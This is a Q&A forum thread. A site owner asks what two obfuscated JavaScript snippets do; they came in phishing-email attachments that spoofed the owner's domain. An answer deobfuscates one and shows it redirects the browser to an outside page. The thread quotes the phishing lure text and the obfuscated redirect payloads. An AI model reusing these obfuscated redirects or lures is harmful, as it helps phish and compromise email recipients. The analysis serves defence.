Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 840103
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: May 15, 20262026-05-15T05:34:18+00:00 2026-05-15T05:34:18+00:00

I’ve just found out that a spammer is sending email from our domain name,

  • 0

I’ve just found out that a spammer is sending email from our domain name, pretending to be us, saying:

Dear Customer,

This e-mail was send by ourwebsite.com
to notify you that we have temporanly
prevented access to your account.

We have reasons to beleive that your
account may have been accessed by
someone else. Please run attached file
and Follow instructions.

(C) ourwebsite.com (I changed that)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

Another email had this:

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it …

Thanks

  • 1 1 Answer
  • 1 View
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-05-15T05:34:19+00:00Added an answer on May 15, 2026 at 5:34 am

    Answer:

    The script executes

    document.location.href = "http://mvblaw.com/z.htm";    //Evil site (I assume)
    

    It also contains a large number of useless lines to hide the script’s true purpose.

    Analysis

    Here it is unpacked.

    function mD() {};
    this.aB = 43719;
    mD.prototype = {
        i: function () {
            var w = new Date();
            this.j = '';
            var x = function () {};
            var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
            var d = new Date();
            y = "";
            aL = "";
            var f = document;
            var s = function () {};
            this.yE = "";
            aN = "";
            var dL = '';
            var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
            this.v = "v";
            var q = 27427;
            var m = new Date();
            iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
            dE = '';
            k = "";
            var qY = function () {};
        }
    };
    xO = false;
    var b = new mD();
    yY = "";
    b.i();
    this.xT = '';
    

    Cleaning up the obfuscations and adding meaningful names, it becomes

    function TempClass() {};
    this.aB = 43719;
    TempClass.prototype = {
        doIt: function () {
            var w = new Date();
            this.j = '';
            var x = function () {};
            var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)
    
            var d = new Date();
            y = "";
            aL = "";
            var f = document;
            var s = function () {};
            this.yE = "";
            aN = "";
            var dL = '';
            var iD = f['location'];
            this.v = "v";
            var q = 27427;
            var m = new Date();
            iD['href'] = a;
            dE = '';
            k = "";
            var qY = function () {};
        }
    };
    xO = false;
    var b = new TempClass();
    yY = "";
    b.doIt();
    this.xT = '';
    

    Removing all of the useless lines, it becomes

    function TempClass() {};
    
    TempClass.prototype = {
        doIt: function () {
            var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)
    
            var f = document;
            var iD = f['location'];
            iD['href'] = a;
        }
    };
    
    var b = new TempClass();
    b.doIt();
    
    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

I'm parsing an RSS feed that has an &#8217; in it. SimpleXML turns this
I know there's a lot of other questions out there that deal with this
I'm trying to decode HTML entries from here NYTimes.com and I cannot figure out
Let's say I'm outputting a post title and in our database, it's Hello Y&#8217;all
I have just tried to save a simple *.rtf file with some websites and
For some reason, after submitting a string like this Jack’s Spindle from a text
link Im having trouble converting the html entites into html characters, (&# 8217;) i
That's pretty much it. I'm using Nokogiri to scrape a web page what has
I've got a string that has curly quotes in it. I'd like to replace
I have a small JavaScript validation script that validates inputs based on Regex. I

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.